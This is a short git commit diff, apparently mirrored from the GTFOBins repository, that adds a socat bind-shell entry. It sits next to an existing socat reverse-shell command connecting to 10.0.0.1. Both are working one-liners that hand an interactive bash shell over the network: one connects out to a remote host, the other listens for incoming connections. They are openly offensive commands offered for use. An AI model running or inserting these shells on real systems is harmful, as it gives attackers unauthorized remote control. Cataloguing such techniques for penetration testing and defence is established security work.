mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Add socat bind-shell
This commit is contained in:
parent
9bc82744fd
commit
4e61de337a
@ -6,4 +6,9 @@ functions:
|
|||||||
RHOST=10.0.0.1
|
RHOST=10.0.0.1
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
||||||
|
bind-shell:
|
||||||
|
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:10.0.0.2:12345</code> to connect to the shell on the other end.
|
||||||
|
code: |
|
||||||
|
LPORT=12345
|
||||||
|
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||||
---
|
---
|
Loading…
Reference in New Issue
Block a user